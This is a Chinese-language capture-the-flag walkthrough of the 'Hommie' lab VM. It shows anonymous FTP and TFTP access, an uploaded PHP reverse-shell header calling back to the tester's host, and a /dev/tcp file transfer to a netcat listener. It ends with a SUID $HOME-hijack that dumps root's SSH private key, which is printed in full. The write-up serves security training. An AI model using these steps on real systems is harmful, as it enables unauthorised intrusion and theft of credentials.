Hommie
Hommie
信息搜集
端口扫描
1
rustscan -a 172.20.10.5 -- -A
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.20.10.8
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDB7u7KKhG7At4Hcc+14cLowxLnO8KM0ktmdNGlQ3NQTg5ccopYqycES73Ie8F8x8LuGmUf63rAlZb58bR8mU0mv5gK6+DvTfsxu8Qv4RlK8ydOyEVhIFk2mukt99lNMmWiQdJ4WHlcSkHFJ0V0YsUiMIQpI+OJQ7yFFIGvmP9wbfxrDcZHPZVt86NgTQ0vwQB/1phH0+DxMNjsaE25qwJ9MDdEs7XxMj31YsTWwm3nLxBbl7SFmRsUsSchrNDTQ355c0kco7/H5cGqI9xm3x9VNCaQmNYapKezhAaEWqvIfP59SCaa8n6NpuP2kPuGJnqdqYo+sM5l/SoCWEJL5HlL
| 256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFedEUVwZ/C0itzERPAKuSiTugyl9+eZm4f9TQOujQAwyWHvyyiarpJCCqyaQg2DdQEPVMtO7cA3SpkISgseJlA=
| 256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO5HkrVfk6hVBmA2oAFN8nYRmsoXH+1hUZIuyF0DN/YA
80/tcp open http syn-ack nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
扫不到就不扫了.
漏洞发现
ftp登录
尝试匿名登录一下:anonymous、ftp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
┌──(kali💀kali)-[~/temp/hommie]
└─$ ftp 172.20.10.5
Connected to 172.20.10.5.
220 (vsFTPd 3.0.3)
Name (172.20.10.5:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||7447|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> ls -F
229 Entering Extended Passive Mode (|||28677|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> cd .web
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||31351|)
150 Here comes the directory listing.
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
226 Directory send OK.
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||45350|)
150 Opening BINARY mode data connection for index.html (99 bytes).
100% |***********************************************************************************************************| 99 1.45 MiB/s 00:00 ETA
226 Transfer complete.
99 bytes received in 00:00 (147.15 KiB/s)
ftp> exit
221 Goodbye.
┌──(kali💀kali)-[~/temp/hommie]
└─$ cat index.html
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody
只有ftp可以,且得到两个用户alexia和nobody
踩点
查看源代码,未发现存在dns解析相关场景。
上传reverseshell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali💀kali)-[~/temp/hommie]
└─$ head revershell.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.20.10.8'; // You have changed this
$port = 1234; // And this
$chunk_size = 1400;
┌──(kali💀kali)-[~/temp/hommie]
└─$ ftp 172.20.10.5
Connected to 172.20.10.5.
220 (vsFTPd 3.0.3)
Name (172.20.10.5:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||16177|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> cd .web
250 Directory successfully changed.
ftp> put revershell.php
local: revershell.php remote: revershell.php
229 Entering Extended Passive Mode (|||62858|)
150 Ok to send data.
100% |***********************************************************************************************************| 3909 93.19 MiB/s 00:00 ETA
226 Transfer complete.
3909 bytes sent in 00:00 (4.25 MiB/s)
ftp> exit
221 Goodbye.
┌──(kali💀kali)-[~/temp/hommie]
└─$ sudo pwncat-cs -lp 1234 2>/dev/null
[01:39:45] Welcome to pwncat 🐈!
能看到有文件,但是不会解析文件。。。。
重新扫描
无法扫描目录,肯定是端口出问题了,重新扫描,看一下UDP。。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali💀kali)-[~/temp/driftingblues7]
└─$ sudo nmap 172.20.10.5 -sU -p 1-100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-13 02:17 EDT
Stats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.99% done; ETC: 02:18 (0:00:00 remaining)
Nmap scan report for 172.20.10.5
Host is up (0.00039s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 08:00:27:84:22:C1 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 112.27 seconds
TFTP连接
尝试连接一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali💀kali)-[~/temp/hommie]
└─$ tftp 172.20.10.5
tftp> help
tftp-hpa 5.2
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
literal toggle literal mode, ignore ':' in file name
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet transmission timeout
timeout set total retransmission timeout
? print help information
help print help information
tftp> ls
?Invalid command
tftp> get *
^C
tftp> get id_rsa
tftp> exit
?Invalid command
tftp> quit
┌──(kali💀kali)-[~/temp/hommie]
└─$ ls
'*' id_rsa index.html revershell.php
尝试使用该凭证实现登录!
ssh连接
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali💀kali)-[~/temp/hommie]
└─$ chmod 600 id_rsa
┌──(kali💀kali)-[~/temp/hommie]
└─$ ssh hommie@172.20.10.5 -i id_rsa
The authenticity of host '172.20.10.5 (172.20.10.5)' can't be established.
ED25519 key fingerprint is SHA256:v3AMNdrxbep3tZ0By0ik1/V+ZHj5ZuiffVZSnafj2YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.20.10.5' (ED25519) to the list of known hosts.
hommie@172.20.10.5: Permission denied (publickey).
┌──(kali💀kali)-[~/temp/hommie]
└─$ ssh alexia@172.20.10.5 -i id_rsa
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 30 11:06:15 2020
alexia@hommie:~$ whoami;id
alexia
uid=1000(alexia) gid=1000(alexia) groups=1000(alexia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
alexia@hommie:~$ sudo -l
-bash: sudo: command not found
alexia@hommie:~$ pwd
/home/alexia
alexia@hommie:~$ ls -la
total 36
drwxr-xr-x 4 alexia alexia 4096 Sep 30 2020 .
drwxr-xr-x 3 root root 4096 Sep 30 2020 ..
-rw-r--r-- 1 alexia alexia 220 Sep 30 2020 .bash_logout
-rw-r--r-- 1 alexia alexia 3526 Sep 30 2020 .bashrc
drwxr-xr-x 3 alexia alexia 4096 Sep 30 2020 .local
-rw-r--r-- 1 alexia alexia 807 Sep 30 2020 .profile
drwx------ 2 alexia alexia 4096 Sep 30 2020 .ssh
-rw-r--r-- 1 alexia alexia 10 Sep 30 2020 user.txt
-rw------- 1 alexia alexia 52 Sep 30 2020 .Xauthority
alexia@hommie:~$ cat user.txt
Imnotroot
alexia@hommie:~$ find / -perm -u=s -type f 2>/dev/null
/opt/showMetheKey
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount
alexia@hommie:~$ file /opt/showMetheKey
/opt/showMetheKey: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=63398a6916b1b6bf3991e2b05fa60bec15b1faff, not stripped
alexia@hommie:~$ cd /opt
分析程序
传过来看看:
1
alexia@hommie:/opt$ cat showMetheKey > /dev/tcp/172.20.10.8/8888
1
2
┌──(kali💀kali)-[~/temp/hommie]
└─$ nc -lp 8888 > showMetheKey
分析一下这个软件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
┌──(kali💀kali)-[~/temp/hommie]
└─$ file showMetheKey
showMetheKey: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=63398a6916b1b6bf3991e2b05fa60bec15b1faff, not stripped
┌──(kali💀kali)-[~/temp/hommie]
└─$ strings showMetheKey
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat $HOME/.ssh/id_rsa
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
showMetheKey.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
ida看一下:
1
2
3
4
5
6
7
8
// main.c
int __cdecl main(int argc, const char **argv, const char **envp)
{
setuid(0);
setgid(0);
system("cat $HOME/.ssh/id_rsa");
return 0;
}
修改$HOME读取id_rsa
这样就简单了,它读取了环境变量的$HOME然后读取了连接私钥,我们修改一下,让其读取root的私钥即可:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
alexia@hommie:/opt$ ./showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7
V0zdgZSRFhMxx0/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z/lIqUNdHJbgLDyaY26G0y
Rn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT
gCnBh1Wb4m4e14yF+Syn4wQVh1u/53XGmeB/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j
QMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq
kyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI
M2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM
dgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE/KJYS5BQRkIw6qLmVLWRqI0eZW
rH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7/ndcaZ4H8KVx0B
tIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku/NHAYDMK5T
d/rSolVOnrmnMV/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi/
+suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE
Ua47n1yGWSWMVaZ55ob3N/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy/2w
pmlMTtfdUo7JfEKbZmsz3auih2/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk
WeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE/Jz
bu4XlJXVeD10ooFofrsZd/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu
3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6
0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14/i5ti7r9z
HlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7/wK7XHTwtQZ7cCQTVqbbs
y6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h/MStsQYtY
OZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08
QPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp
ivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV/wN
0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
alexia@hommie:/opt$ echo $HOME
/home/alexia
alexia@hommie:/opt$ HOME = /root
-bash: HOME: command not found
alexia@hommie:/opt$ HOME=/root
alexia@hommie:/opt$ echo $HOME
/root
alexia@hommie:/opt$ ./showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvBYog1I3rTTmtMw6i7oPRYy7yj8N6zNT3K9QhalnaTF+Md5NjbX5
hhNfZjO0tNbMGEeJtNTc3FpYWcAujrrd3jO5MzHUWAxQoyYYrZOFj2I5Fz/0RxD7e89H11
5nT7+CSUeddP/UeoyvSPgaruwrwD+dUl7+GiXo3sc5vsq3YufTYh1MlMKb/m7KmVk5n4Tk
/IFJwuuc3U4OZiRwXOmK4W2Gfo0Fonu6vFYmhpcCsi7V8g3hpVmOZIU8ZUtG1YbutCVbOC
EGyc1p5nbnyC0IIF5Y2EhjeevX8gmj4Kdv/y6yuvNdsJKm+ed2EEY9AymmPPwIpQshFwKz
Y0yB8N1jkQAAA8BiCyR9YgskfQAAAAdzc2gtcnNhAAABAQC8FiiDUjetNOa0zDqLug9FjL
vKPw3rM1Pcr1CFqWdpMX4x3k2NtfmGE19mM7S01swYR4m01NzcWlhZwC6Out3eM7kzMdRY
DFCjJhitk4WPYjkXP/RHEPt7z0fXXmdPv4JJR510/9R6jK9I+Bqu7CvAP51SXv4aJejexz
m+yrdi59NiHUyUwpv+bsqZWTmfhOT8gUnC65zdTg5mJHBc6YrhbYZ+jQWie7q8ViaGlwKy
LtXyDeGlWY5khTxlS0bVhu60JVs4IQbJzWnmdufILQggXljYSGN569fyCaPgp2//LrK681
2wkqb553YQRj0DKaY8/AilCyEXArNjTIHw3WORAAAAAwEAAQAAAQA/OvPDshAlmnM0tLO5
5YLczsMS6r+zIj4/InDffmPVaV4TRbisu1B3Umvv39IQOWXDg8k3kZfuPDEXexQrx4Zu/N
R18XqBXyJ8toH1WHK+ETdAKa/ldEAXD0gHjyUMGkWifQDiJF86E7GZxk6yH5NVvg0Vc/nY
sIXo3vD6wwuDo/gj+u4RRYMH3NYkLSj/O67cxGXnTOZPGzGsFTrE218BNtNqbRBR9/immU
irjugqebxY135Z4oECe/Hv4mP2e7n5QVO8FnYklQ4YU6y0ZTAMtjZCAhslXSKvaJPLjXuk
/HpdYhSoojm3vTAq/NT/oir0wA2ZYGdnF/Bxm6v/mntBAAAAgF2pqZEe9UqzcsAfOujr6z
DMRgPpl8qsdhDz6aftdg24AYmgXJ1D7PWUDpU6puO3VxJGrOwvcgD6xELRTxeFjd/2ssrh
4OO/kTvK4K0WVB/bnZ4y724iLcThfHDbzTTc5ckn45tyso8540iKha5ay1i24GwRPWddie
B/qcB1bHNOAAAAgQDmmptuwTRwUSiU1NtZRnJFvxvzLw6Wy/Cb2G+n5KY0ce5cYHT2HSIr
zsbPaDXQNBFy4iu1DAXAJJXTrxjOaAeLVYSb/8eZ1dhcgkxoAC8i2l6NwNmsjhGQKv++fV
qMfIdzVmriLXBZf7DU97YZeDIOrdOOV5CHhq+37i4xNdK18wAAAIEA0Mzc8HYvrXk4ecyi
KXP5u2Zxw2LADJ8DFeKWZmCUuNKFD1TuqdauxKxIVKVDaHvcnEr1bOiEBBso/X1CCtKjE+
12ZOWvqZ4fORxiNs9n/9YxlUSDAw7kyKd9H7dRRFdtb80OgDiwf18tDlEdboGWm/DR0NPq
gmxzbd40GES6DWsAAAALcm9vdEBob21taWU=
-----END OPENSSH PRIVATE KEY-----
alexia@hommie:/opt$ ./showMetheKey > /tmp/id_rsa
alexia@hommie:/opt$ cd /tmp
alexia@hommie:/tmp$ chmod 600 id_rsa
alexia@hommie:/tmp$ ssh root@172.20.10.5 -i id_rsa
The authenticity of host '172.20.10.5 (172.20.10.5)' can't be established.
ECDSA key fingerprint is SHA256:DJRhY4460szersb1lOMrzcqIuOctjcM95lIbf2pvnNk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.20.10.5' (ECDSA) to the list of known hosts.
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 30 11:03:23 2020
root@hommie:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@hommie:~# cd /root
root@hommie:~# ls -la
total 32
drwx------ 4 root root 4096 Sep 30 2020 .
drwxr-xr-x 18 root root 4096 Sep 30 2020 ..
-rw------- 1 root root 52 Sep 30 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Sep 30 2020 .local
-rw------- 1 root root 44 Sep 30 2020 note.txt
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Sep 30 2020 .ssh
root@hommie:~# cat note.txt
I dont remember where I stored root.txt !!!
root@hommie:~# cat .bash_history
cd /root
ls -la
rm .bash_history
/usr/sbin/poweroff
root@hommie:~# find / -name root.txt -type f 2>/dev/null
/usr/include/root.txt
root@hommie:~# cat /usr/include/root.txt
Imnotbatman
本文由作者按照 CC BY 4.0 进行授权